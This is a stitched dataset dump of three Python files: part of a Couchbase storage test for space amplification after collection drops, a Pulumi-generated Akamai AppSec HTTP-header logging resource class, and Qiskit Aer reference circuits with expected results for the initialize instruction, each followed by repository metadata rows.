self.disk_usage[self.disk_usage.keys()[0]]))
# # # # Space Amplification check ends # # # #
self.log.info("====test_drop_collections_after_upserts====")
def test_drop_collections_after_deletes(self):
"""
Test will check space
Amplification after collection drop
!) Create multiple collections
2) Load docs in all collections
3) Delete 3/4th of docs in one collection
4) Since default frag is 50, auto compaction shouldn't trigger
5) Drop a collection
6)Auto compaction shoudl trigger now, Verify space amplification
"""
scope_name = CbServer.default_scope
collection_prefix = "FunctionCollection"
# # # # Non Default Scope creation # # # #
if self.num_scopes > 1:
scope_name = "FunctionScope"
self.bucket_util.create_scope(self.cluster.master,
self.buckets[0],
{"name": scope_name})
# # # # Collections Creation # # # #
for i in range(self.num_collections):
collection_name = collection_prefix + str(i)
self.log.info("Creating scope::collection {} {}\
".format(scope_name, collection_name))
self.bucket_util.create_collection(
self.cluster.master, self.buckets[0],
scope_name, {"name": collection_name})
self.sleep(2)
collections = self.buckets[0].scopes[scope_name].collections.keys()
if self.num_collections > 1 and scope_name is CbServer.default_scope:
collections.remove(CbServer.default_collection)
self.log.info("List of collections {}".format(collections))
# # # # DOC LOADING # # # #
end = 0
init_items = self.num_items
tasks_info = dict()
self.doc_ops = "create"
for collection in collections:
start = end
end += init_items
self.gen_create = doc_generator(
self.key, start, end,
doc_size=self.doc_size,
doc_type=self.doc_type,
target_vbucket=self.target_vbucket,
vbuckets=self.cluster_util.vbuckets,
key_size=self.key_size,
randomize_doc_size=self.randomize_doc_size,
randomize_value=self.randomize_value,
mix_key_size=self.mix_key_size,
deep_copy=self.deep_copy)
tem_tasks_info = self.loadgen_docs(
self.retry_exceptions,
self.ignore_exceptions,
scope=scope_name,
collection=collection,
_sync=False)
tasks_info.update(tem_tasks_info.items())
self.num_items -= init_items
for task in tasks_info:
self.task_manager.get_task_result(task)
self.bucket_util.verify_doc_op_task_exceptions(
tasks_info, self.cluster)
self.bucket_util.log_doc_ops_task_failures(tasks_info)
self.log.info("Verifying num_items counts after doc_ops")
self.bucket_util._wait_for_stats_all_buckets()
self.bucket_util.verify_stats_all_buckets(self.num_items)
# # # # Initial Disk Usage # # # #
disk_usage = self.get_disk_usage(
self.buckets[0], self.cluster.nodes_in_cluster)
self.disk_usage[self.buckets[0].name] = disk_usage[0]
self.log.info(
"For bucket {} disk usage after initial '\n' \
creation is {}MB".format(
self.buckets[0].name,
self.disk_usage[self.buckets[0].name]))
# Space amplification check before deletes
# This check is to make sure, compaction doesn't get triggerd
_result = self.check_fragmentation_using_magma_stats(
self.buckets[0], self.cluster.nodes_in_cluster)
self.assertIs(_result, True,
"Fragmentation value exceeds from '\n' \
the configured fragementaion value")
_r = self.check_fragmentation_using_bucket_stats(
self.buckets[0], self.cluster.nodes_in_cluster)
self.assertIs(_r, True,
"Fragmentation value exceeds from '\n' \
the configured fragementaion value")
# # # # Delete 3/4th docs in a single collection # # # #
self.doc_ops = "delete"
self.log.info("For deletion collection picked is {} \
".format(collections[-1]))
self.gen_delete = doc_generator(
self.key, start, start + int(0.75 * (end-start)),
doc_size=self.doc_size,
doc_type=self.doc_type,
target_vbucket=self.target_vbucket,
vbuckets=self.cluster_util.vbuckets,
key_size=self.key_size,
randomize_doc_size=self.randomize_doc_size,
randomize_value=self.randomize_value,
mix_key_size=self.mix_key_size,
deep_copy=self.deep_copy)
_ = self.loadgen_docs(self.retry_exceptions,
self.ignore_exceptions,
scope=scope_name,
collection=collections[-1],
_sync=True)
self.log.info("Waiting for ep-queues to get drained")
self.bucket_util._wait_for_stats_all_buckets()
# # # # Drop a collection # # # #
self.log.info("Collection to be dropped {}\
".format(collections[0]))
self.bucket_util.drop_collection(
self.cluster.master, self.buckets[0],
scope_name=scope_name,
collection_name=collections[0])
self.buckets[0].scopes[scope_name].collections.pop(collections[0])
collections.remove(collections[0])
# # # # Space Amplification check # # # #
_result = self.check_fragmentation_using_magma_stats(
self.buckets[0], self.cluster.nodes_in_cluster)
self.assertIs(_result, True,
"Fragmentation value exceeds from '\n' \
the configured fragementaion value")
_r = self.check_fragmentation_using_bucket_stats(
self.buckets[0], self.cluster.nodes_in_cluster)
self.assertIs(_r, True,
"Fragmentation value exceeds from '\n' \
the configured fragementaion value")
# # # # Space Amplification check ends # # # #
self.log.info("====test_drop_collections_after_deletes====")
| 42.917683
| 77
| 0.586418
| 1,563
| 14,077
| 5.015355
| 0.120282
| 0.035081
| 0.03827
| 0.022962
| 0.845388
| 0.815155
| 0.811456
| 0.811456
| 0.803546
| 0.796658
| 0
| 0.008603
| 0.322867
| 14,077
| 327
| 78
| 43.04893
| 0.813785
| 0.076579
| 0
| 0.812261
| 0
| 0
| 0.039535
| 0.006759
| 0
| 0
| 0
| 0
| 0.02682
| 1
| 0.019157
| false
| 0
| 0.011494
| 0
| 0.034483
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dbd307a3faaff0cec21361b697c9bf3126b647c1
| 16,564
|
py
|
Python
|
sdk/python/pulumi_akamai/app_sec_advanced_settings_logging.py
|
pulumi/pulumi-akamai
|
85f933ccf2f61738b3074a13fa718132280f8364
|
[
"ECL-2.0",
"Apache-2.0"
] | 3
|
2021-01-21T15:22:12.000Z
|
2021-08-25T14:15:29.000Z
|
sdk/python/pulumi_akamai/app_sec_advanced_settings_logging.py
|
pulumi/pulumi-akamai
|
85f933ccf2f61738b3074a13fa718132280f8364
|
[
"ECL-2.0",
"Apache-2.0"
] | 59
|
2020-08-13T14:39:36.000Z
|
2022-03-31T15:19:48.000Z
|
sdk/python/pulumi_akamai/app_sec_advanced_settings_logging.py
|
pulumi/pulumi-akamai
|
85f933ccf2f61738b3074a13fa718132280f8364
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['AppSecAdvancedSettingsLoggingArgs', 'AppSecAdvancedSettingsLogging']
@pulumi.input_type
class AppSecAdvancedSettingsLoggingArgs:
def __init__(__self__, *,
config_id: pulumi.Input[int],
logging: pulumi.Input[str],
security_policy_id: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a AppSecAdvancedSettingsLogging resource.
:param pulumi.Input[int] config_id: . Unique identifier of the security configuration containing the logging settings being modified.
:param pulumi.Input[str] logging: . Path to a JSON file containing the logging settings to be configured. A sample JSON file can be found in the [Modify HTTP header log settings for a configuration](https://developer.akamai.com/api/cloud_security/application_security/v1.html#puthttpheaderloggingforaconfiguration) section of the Application Security API documentation.
:param pulumi.Input[str] security_policy_id: . Unique identifier of the security policies whose settings are being modified. If not included, the logging settings are modified at the configuration scope and, as a result, apply to all the security policies associated with the configuration.
"""
pulumi.set(__self__, "config_id", config_id)
pulumi.set(__self__, "logging", logging)
if security_policy_id is not None:
pulumi.set(__self__, "security_policy_id", security_policy_id)
@property
@pulumi.getter(name="configId")
def config_id(self) -> pulumi.Input[int]:
"""
. Unique identifier of the security configuration containing the logging settings being modified.
"""
return pulumi.get(self, "config_id")
@config_id.setter
def config_id(self, value: pulumi.Input[int]):
pulumi.set(self, "config_id", value)
@property
@pulumi.getter
def logging(self) -> pulumi.Input[str]:
"""
. Path to a JSON file containing the logging settings to be configured. A sample JSON file can be found in the [Modify HTTP header log settings for a configuration](https://developer.akamai.com/api/cloud_security/application_security/v1.html#puthttpheaderloggingforaconfiguration) section of the Application Security API documentation.
"""
return pulumi.get(self, "logging")
@logging.setter
def logging(self, value: pulumi.Input[str]):
pulumi.set(self, "logging", value)
@property
@pulumi.getter(name="securityPolicyId")
def security_policy_id(self) -> Optional[pulumi.Input[str]]:
"""
. Unique identifier of the security policies whose settings are being modified. If not included, the logging settings are modified at the configuration scope and, as a result, apply to all the security policies associated with the configuration.
"""
return pulumi.get(self, "security_policy_id")
@security_policy_id.setter
def security_policy_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "security_policy_id", value)
@pulumi.input_type
class _AppSecAdvancedSettingsLoggingState:
def __init__(__self__, *,
config_id: Optional[pulumi.Input[int]] = None,
logging: Optional[pulumi.Input[str]] = None,
security_policy_id: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering AppSecAdvancedSettingsLogging resources.
:param pulumi.Input[int] config_id: . Unique identifier of the security configuration containing the logging settings being modified.
:param pulumi.Input[str] logging: . Path to a JSON file containing the logging settings to be configured. A sample JSON file can be found in the [Modify HTTP header log settings for a configuration](https://developer.akamai.com/api/cloud_security/application_security/v1.html#puthttpheaderloggingforaconfiguration) section of the Application Security API documentation.
:param pulumi.Input[str] security_policy_id: . Unique identifier of the security policies whose settings are being modified. If not included, the logging settings are modified at the configuration scope and, as a result, apply to all the security policies associated with the configuration.
"""
if config_id is not None:
pulumi.set(__self__, "config_id", config_id)
if logging is not None:
pulumi.set(__self__, "logging", logging)
if security_policy_id is not None:
pulumi.set(__self__, "security_policy_id", security_policy_id)
@property
@pulumi.getter(name="configId")
def config_id(self) -> Optional[pulumi.Input[int]]:
"""
. Unique identifier of the security configuration containing the logging settings being modified.
"""
return pulumi.get(self, "config_id")
@config_id.setter
def config_id(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "config_id", value)
@property
@pulumi.getter
def logging(self) -> Optional[pulumi.Input[str]]:
"""
. Path to a JSON file containing the logging settings to be configured. A sample JSON file can be found in the [Modify HTTP header log settings for a configuration](https://developer.akamai.com/api/cloud_security/application_security/v1.html#puthttpheaderloggingforaconfiguration) section of the Application Security API documentation.
"""
return pulumi.get(self, "logging")
@logging.setter
def logging(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "logging", value)
@property
@pulumi.getter(name="securityPolicyId")
def security_policy_id(self) -> Optional[pulumi.Input[str]]:
"""
. Unique identifier of the security policies whose settings are being modified. If not included, the logging settings are modified at the configuration scope and, as a result, apply to all the security policies associated with the configuration.
"""
return pulumi.get(self, "security_policy_id")
@security_policy_id.setter
def security_policy_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "security_policy_id", value)
class AppSecAdvancedSettingsLogging(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
config_id: Optional[pulumi.Input[int]] = None,
logging: Optional[pulumi.Input[str]] = None,
security_policy_id: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
**Scopes**: Security configuration; security policy
Enables, disables, or updates HTTP header logging settings. By default, this operation applies at the configuration level, which means that it applies to all the security policies within that configuration. However, by using the `security_policy_id` parameter you can specify custom settings for an individual security policy.
**Related API Endpoint**: [/appsec/v1/configs/{configId}/versions/{versionNumber}/advanced-settings/logging](https://developer.akamai.com/api/cloud_security/application_security/v1.html#puthttpheaderlogging)
## Example Usage
Basic usage:
```python
import pulumi
import pulumi_akamai as akamai
configuration = akamai.get_app_sec_configuration(name="Documentation")
logging = akamai.AppSecAdvancedSettingsLogging("logging",
config_id=configuration.config_id,
logging=(lambda path: open(path).read())(f"{path['module']}/logging.json"))
# USE CASE: User wants to configure logging settings for a security policy.
policy_logging = akamai.AppSecAdvancedSettingsLogging("policyLogging",
config_id=configuration.config_id,
security_policy_id="gms1_134637",
logging=(lambda path: open(path).read())(f"{path['module']}/logging.json"))
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[int] config_id: . Unique identifier of the security configuration containing the logging settings being modified.
:param pulumi.Input[str] logging: . Path to a JSON file containing the logging settings to be configured. A sample JSON file can be found in the [Modify HTTP header log settings for a configuration](https://developer.akamai.com/api/cloud_security/application_security/v1.html#puthttpheaderloggingforaconfiguration) section of the Application Security API documentation.
:param pulumi.Input[str] security_policy_id: . Unique identifier of the security policies whose settings are being modified. If not included, the logging settings are modified at the configuration scope and, as a result, apply to all the security policies associated with the configuration.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: AppSecAdvancedSettingsLoggingArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
**Scopes**: Security configuration; security policy
Enables, disables, or updates HTTP header logging settings. By default, this operation applies at the configuration level, which means that it applies to all the security policies within that configuration. However, by using the `security_policy_id` parameter you can specify custom settings for an individual security policy.
**Related API Endpoint**: [/appsec/v1/configs/{configId}/versions/{versionNumber}/advanced-settings/logging](https://developer.akamai.com/api/cloud_security/application_security/v1.html#puthttpheaderlogging)
## Example Usage
Basic usage:
```python
import pulumi
import pulumi_akamai as akamai
configuration = akamai.get_app_sec_configuration(name="Documentation")
logging = akamai.AppSecAdvancedSettingsLogging("logging",
config_id=configuration.config_id,
logging=(lambda path: open(path).read())(f"{path['module']}/logging.json"))
# USE CASE: User wants to configure logging settings for a security policy.
policy_logging = akamai.AppSecAdvancedSettingsLogging("policyLogging",
config_id=configuration.config_id,
security_policy_id="gms1_134637",
logging=(lambda path: open(path).read())(f"{path['module']}/logging.json"))
```
:param str resource_name: The name of the resource.
:param AppSecAdvancedSettingsLoggingArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(AppSecAdvancedSettingsLoggingArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
config_id: Optional[pulumi.Input[int]] = None,
logging: Optional[pulumi.Input[str]] = None,
security_policy_id: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = AppSecAdvancedSettingsLoggingArgs.__new__(AppSecAdvancedSettingsLoggingArgs)
if config_id is None and not opts.urn:
raise TypeError("Missing required property 'config_id'")
__props__.__dict__["config_id"] = config_id
if logging is None and not opts.urn:
raise TypeError("Missing required property 'logging'")
__props__.__dict__["logging"] = logging
__props__.__dict__["security_policy_id"] = security_policy_id
super(AppSecAdvancedSettingsLogging, __self__).__init__(
'akamai:index/appSecAdvancedSettingsLogging:AppSecAdvancedSettingsLogging',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
config_id: Optional[pulumi.Input[int]] = None,
logging: Optional[pulumi.Input[str]] = None,
security_policy_id: Optional[pulumi.Input[str]] = None) -> 'AppSecAdvancedSettingsLogging':
"""
Get an existing AppSecAdvancedSettingsLogging resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[int] config_id: . Unique identifier of the security configuration containing the logging settings being modified.
:param pulumi.Input[str] logging: . Path to a JSON file containing the logging settings to be configured. A sample JSON file can be found in the [Modify HTTP header log settings for a configuration](https://developer.akamai.com/api/cloud_security/application_security/v1.html#puthttpheaderloggingforaconfiguration) section of the Application Security API documentation.
:param pulumi.Input[str] security_policy_id: . Unique identifier of the security policies whose settings are being modified. If not included, the logging settings are modified at the configuration scope and, as a result, apply to all the security policies associated with the configuration.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _AppSecAdvancedSettingsLoggingState.__new__(_AppSecAdvancedSettingsLoggingState)
__props__.__dict__["config_id"] = config_id
__props__.__dict__["logging"] = logging
__props__.__dict__["security_policy_id"] = security_policy_id
return AppSecAdvancedSettingsLogging(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="configId")
def config_id(self) -> pulumi.Output[int]:
"""
. Unique identifier of the security configuration containing the logging settings being modified.
"""
return pulumi.get(self, "config_id")
@property
@pulumi.getter
def logging(self) -> pulumi.Output[str]:
"""
. Path to a JSON file containing the logging settings to be configured. A sample JSON file can be found in the [Modify HTTP header log settings for a configuration](https://developer.akamai.com/api/cloud_security/application_security/v1.html#puthttpheaderloggingforaconfiguration) section of the Application Security API documentation.
"""
return pulumi.get(self, "logging")
@property
@pulumi.getter(name="securityPolicyId")
def security_policy_id(self) -> pulumi.Output[Optional[str]]:
"""
. Unique identifier of the security policies whose settings are being modified. If not included, the logging settings are modified at the configuration scope and, as a result, apply to all the security policies associated with the configuration.
"""
return pulumi.get(self, "security_policy_id")
| 57.117241
| 377
| 0.704117
| 1,956
| 16,564
| 5.780164
| 0.108896
| 0.041836
| 0.049531
| 0.029188
| 0.822041
| 0.808067
| 0.802494
| 0.782682
| 0.774456
| 0.773748
| 0
| 0.001994
| 0.21269
| 16,564
| 289
| 378
| 57.314879
| 0.864964
| 0.527228
| 0
| 0.59589
| 1
| 0
| 0.108988
| 0.023071
| 0
| 0
| 0
| 0
| 0
| 1
| 0.150685
| false
| 0.006849
| 0.034247
| 0
| 0.273973
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
91db2b2b058bcbace267a6750d2a10e1c9ba8c20
| 12,228
|
py
|
Python
|
test/terra/reference/ref_initialize.py
|
eliarbel/qiskit-aer
|
827f8922948dd18a588e8617bccaec465934280f
|
[
"Apache-2.0"
] | 1
|
2019-12-12T07:58:14.000Z
|
2019-12-12T07:58:14.000Z
|
test/terra/reference/ref_initialize.py
|
BryceFuller/qiskit-aer
|
abd418e37359210e809a94e74db33f08ad053fd6
|
[
"Apache-2.0"
] | 29
|
2018-12-19T10:11:00.000Z
|
2018-12-19T10:16:18.000Z
|
test/terra/reference/ref_initialize.py
|
BryceFuller/qiskit-aer
|
abd418e37359210e809a94e74db33f08ad053fd6
|
[
"Apache-2.0"
] | null | null | null |
# This code is part of Qiskit.
#
# (C) Copyright IBM 2018, 2019.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""
Test circuits and reference outputs for initialize instruction.
"""
from numpy import array, sqrt
from qiskit import QuantumRegister, ClassicalRegister, QuantumCircuit
def initialize_circuits_1(final_measure=True):
"""Initialize test circuits"""
circuits = []
qr = QuantumRegister(3)
if final_measure:
cr = ClassicalRegister(3)
regs = (qr, cr)
else:
regs = (qr, )
# Start with |+++> state
# Initialize qr[i] to |1> for i=0,1,2
for qubit in range(3):
circuit = QuantumCircuit(*regs)
circuit.h(qr[0])
circuit.h(qr[1])
circuit.h(qr[2])
circuit.initialize([0, 1], [qr[qubit]])
if final_measure:
circuit.barrier(qr)
circuit.measure(qr, cr)
circuits.append(circuit)
# Start with |+++> state
# Initialize qr[i] to |1> and qr[j] to |0>
# For [i,j] = [0,1], [1, 0], [0, 2], [2, 0], [1, 2], [2, 1]
for qubit_i in range(3):
for qubit_j in range(3):
if (qubit_i != qubit_j):
circuit = QuantumCircuit(*regs)
circuit.h(qr[0])
circuit.h(qr[1])
circuit.h(qr[2])
circuit.initialize([0, 1, 0, 0], [qr[qubit_i], qr[qubit_j]])
if final_measure:
circuit.barrier(qr)
circuit.measure(qr, cr)
circuits.append(circuit)
# Start with |+++> state
# Initialize qr[i] to |1>, qr[j] to |0> and qr[k] to |->
# For [i,j,k] = [0, 1, 2], [0, 2, 1], [1, 0, 2], [1, 2, 0], [2, 0, 1], [2, 1, 0]
for qubit_i in range(3):
for qubit_j in range(3):
for qubit_k in range(3):
if (qubit_i != qubit_j) & (qubit_i != qubit_k) & (qubit_k != qubit_j):
circuit = QuantumCircuit(*regs)
circuit.h(qr[0])
circuit.h(qr[1])
circuit.h(qr[2])
circuit.initialize([0, 1, 0, 0, 0, -1, 0, 0] / sqrt(2), \
[qr[qubit_i], qr[qubit_j], qr[qubit_k]])
if final_measure:
circuit.barrier(qr)
circuit.measure(qr, cr)
circuits.append(circuit)
return circuits
def initialize_counts_1(shots, hex_counts=True):
"""Initialize test circuits reference counts."""
targets = []
if hex_counts:
# Initialize 0 to |1> from |+++>
targets.append({'0x1': shots/4,
'0x3': shots/4,
'0x5': shots/4,
'0x7': shots/4})
# Initialize 1 to |1> from |+++>
targets.append({'0x2': shots/4,
'0x3': shots/4,
'0x6': shots/4,
'0x7': shots/4})
# Initialize 2 to |1> from |+++>
targets.append({'0x4': shots/4,
'0x5': shots/4,
'0x6': shots/4,
'0x7': shots/4})
# Initialize 0,1 to |01> from |+++>
targets.append({'0x1': shots/2,
'0x5': shots/2})
# Initialize 0,2 to |01> from |+++>
targets.append({'0x1': shots/2,
'0x3': shots/2})
# Initialize 1,0 to |01> from |+++>
targets.append({'0x2': shots/2,
'0x6': shots/2})
# Initialize 1,2 to |01> from |+++>
targets.append({'0x2': shots/2,
'0x3': shots/2})
# Initialize 2,0 to |01> from |+++>
targets.append({'0x4': shots/2,
'0x6': shots/2})
# Initialize 2,1 to |01> from |+++>
targets.append({'0x4': shots/2,
'0x5': shots/2})
# Initialize 0,1,2 to |01-> from |+++>
targets.append({'0x1': shots/2,
'0x5': shots/2})
# Initialize 0,2,1 to |01-> from |+++>
targets.append({'0x1': shots/2,
'0x3': shots/2})
# Initialize 1,0,2 to |01-> from |+++>
targets.append({'0x2': shots/2,
'0x6': shots/2})
# Initialize 1,2,0 to |01-> from |+++>
targets.append({'0x2': shots/2,
'0x3': shots/2})
# Initialize 2,0,1 to |01-> from |+++>
targets.append({'0x4': shots/2,
'0x6': shots/2})
# Initialize 2,1,0 to |01-> from |+++>
targets.append({'0x4': shots/2,
'0x5': shots/2})
else:
# Initialize 0 to |1> from |+++>
targets.append({'001': shots/4,
'011': shots/4,
'101': shots/4,
'111': shots/4})
# Initialize 1 to |1> from |+++>
targets.append({'010': shots/4,
'011': shots/4,
'110': shots/4,
'111': shots/4})
# Initialize 2 to |1> from |+++>
targets.append({'100': shots/4,
'101': shots/4,
'110': shots/4,
'111': shots/4})
# Initialize 0,1 to |01> from |+++>
targets.append({'001': shots/2,
'101': shots/2})
# Initialize 0,2 to |01> from |+++>
targets.append({'001': shots/2,
'011': shots/2})
# Initialize 1,0 to |01> from |+++>
targets.append({'010': shots/2,
'110': shots/2})
# Initialize 1,2 to |01> from |+++>
targets.append({'010': shots/2,
'011': shots/2})
# Initialize 2,0 to |01> from |+++>
targets.append({'100': shots/2,
'110': shots/2})
# Initialize 2,1 to |01> from |+++>
targets.append({'100': shots/2,
'101': shots/2})
# Initialize 0,1,2 to |01-> from |+++>
targets.append({'001': shots/2,
'101': shots/2})
# Initialize 0,2,1 to |01-> from |+++>
targets.append({'001': shots/2,
'011': shots/2})
# Initialize 1,0,2 to |01-> from |+++>
targets.append({'010': shots/2,
'110': shots/2})
# Initialize 1,2,0 to |01-> from |+++>
targets.append({'010': shots/2,
'011': shots/2})
# Initialize 2,0,1 to |01-> from |+++>
targets.append({'100': shots/2,
'110': shots/2})
# Initialize 2,1,0 to |01-> from |+++>
targets.append({'100': shots/2,
'101': shots/2})
return targets
def initialize_statevector_1():
"""Initialize test circuits reference counts."""
targets = []
# Start with |+++> state
# Initialize qr[i] to |1> for i=0,1,2
targets.append(array([0. +0.j, 0.5+0.j, 0. +0.j, 0.5+0.j, 0. +0.j, 0.5+0.j, 0. +0.j, 0.5+0.j]))
targets.append(array([0. +0.j, 0. +0.j, 0.5+0.j, 0.5+0.j, 0. +0.j, 0. +0.j, 0.5+0.j, 0.5+0.j]))
targets.append(array([0. +0.j, 0. +0.j, 0. +0.j, 0. +0.j, 0.5+0.j, 0.5+0.j, 0.5+0.j, 0.5+0.j]))
# Start with |+++> state
# Initialize qr[i] to |1> and qr[j] to |0>
# For [i,j] = [0,1], [1, 0], [0, 2], [2, 0], [1, 2], [2, 1]
targets.append(array([0. + 0.j, 1.0 + 0.j, 0. + 0.j, 0. + 0.j, \
0. + 0.j, 1.0 + 0.j, 0. + 0.j, 0. + 0.j] / sqrt(2)))
targets.append(array([0. + 0.j, 1.0 + 0.j, 0. + 0.j, 1.0 + 0.j, \
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j] / sqrt(2)))
targets.append(array([0. + 0.j, 0. + 0.j, 1.0 + 0.j, 0. + 0.j, \
0. + 0.j, 0. + 0.j, 1.0 + 0.j, 0. + 0.j] / sqrt(2)))
targets.append(array([0. + 0.j, 0. + 0.j, 1.0 + 0.j, 1.0 + 0.j, \
0. + 0.j, 0. + 0.j, 0 + 0.j, 0. + 0.j] / sqrt(2)))
targets.append(array([0. + 0.j, 0. + 0.j, 0 + 0.j, 0. + 0.j, \
1.0 + 0.j, 0. + 0.j, 1.0 + 0.j, 0. + 0.j] / sqrt(2)))
targets.append(array([0. + 0.j, 0. + 0.j, 0 + 0.j, 0. + 0.j, \
1.0 + 0.j, 1.0 + 0.j, 0. + 0.j, 0. + 0.j] / sqrt(2)))
# Start with |+++> state
# Initialize qr[i] to |1>, qr[j] to |0> and qr[k] to |->
# For [i,j,k] = [0, 1, 2], [0, 2, 1], [1, 0, 2], [1, 2, 0], [2, 0, 1], [2, 1, 0]
targets.append(array([0. + 0.j, 1.0 + 0.j, 0. + 0.j, 0. + 0.j, \
0. + 0.j, -1.0 + 0.j, 0. + 0.j, 0. + 0.j] / sqrt(2)))
targets.append(array([0. + 0.j, 1.0 + 0.j, 0. + 0.j, -1.0 + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j] / sqrt(2)))
targets.append(array([0. + 0.j, 0. + 0.j, 1.0 + 0.j, 0. + 0.j, \
0. + 0.j, 0. + 0.j, -1.0 + 0.j, 0. + 0.j] / sqrt(2)))
targets.append(array([0. + 0.j, 0. + 0.j, 1.0 + 0.j, -1.0 + 0.j, \
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j] / sqrt(2)))
targets.append(array([0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, \
1.0 + 0.j, 0. + 0.j, -1.0 + 0.j, 0. + 0.j] / sqrt(2)))
targets.append(array([0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, \
1.0 + 0.j, -1.0 + 0.j, 0. + 0.j, 0. + 0.j] / sqrt(2)))
return targets
def initialize_circuits_2(final_measure=True):
"""Initialize test circuits"""
circuits = []
qr = QuantumRegister(2)
if final_measure:
cr = ClassicalRegister(2)
regs = (qr, cr)
else:
regs = (qr, )
# Initialize 0 to |1> from |++>
circuit = QuantumCircuit(*regs)
circuit.h(qr)
circuit.initialize([0, 1], [qr[0]])
if final_measure:
circuit.barrier(qr)
circuit.measure(qr, cr)
circuits.append(circuit)
# Initialize 1 to |1> from |++>
circuit = QuantumCircuit(*regs)
circuit.h(qr)
circuit.initialize([0, 1], [qr[1]])
if final_measure:
circuit.barrier(qr)
circuit.measure(qr, cr)
circuits.append(circuit)
return circuits
def initialize_counts_2(shots, hex_counts=True):
"""Initialize test circuits reference counts."""
targets = []
if hex_counts:
# Initialize 0 to |1> from |++>
targets.append({'0x1': shots / 2, '0x3': shots / 2})
# Initialize 1 to |1> from |++>
targets.append({'0x2': shots / 2, '0x3': shots / 2})
else:
# Initialize 0 to |1> from |++>
targets.append({'01': shots / 2, '11': shots / 2})
# Initialize 1 to |1> from |++>
targets.append({'10': shots / 2, '11': shots / 2})
return targets
def initialize_statevector_2():
"""Initialize test circuits reference counts."""
targets = []
# Initialize 0 to |1> from |++>
targets.append(array([0, 1, 0, 1]) / sqrt(2))
# Initialize 1 to |1> from |++>
targets.append(array([0, 0, 1, 1]) / sqrt(2))
return targets
# ==========================================================================
# Sampling optimization
# ==========================================================================
def initialize_sampling_optimization():
"""Test sampling optimization"""
qr = QuantumRegister(2)
cr = ClassicalRegister(2)
qc = QuantumCircuit(qr, cr)
# The optimization should not be triggerred
# because the initialize operation performs randomizations
qc.h(qr[0])
qc.cx(qr[0], qr[1])
qc.initialize([1, 0], [qr[0]])
qc.measure(qr, cr)
return [qc]
def initialize_counts_sampling_optimization(shots, hex_counts=True):
"""Sampling optimization counts"""
if hex_counts:
return [{'0x0': shots/2, '0x2': shots/2}]
else:
return [{'0x00': shots/2, '0x10': shots/2}]
| 37.857585
| 99
| 0.456003
| 1,706
| 12,228
| 3.239156
| 0.079132
| 0.043431
| 0.058632
| 0.052117
| 0.80818
| 0.769273
| 0.737785
| 0.715527
| 0.70105
| 0.624502
| 0
| 0.108657
| 0.348217
| 12,228
| 322
| 100
| 37.975155
| 0.584693
| 0.247628
| 0
| 0.717073
| 0
| 0
| 0.027524
| 0
| 0
| 0
| 0.014753
| 0
| 0
| 1
| 0.039024
| false
| 0
| 0.009756
| 0
| 0.092683
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
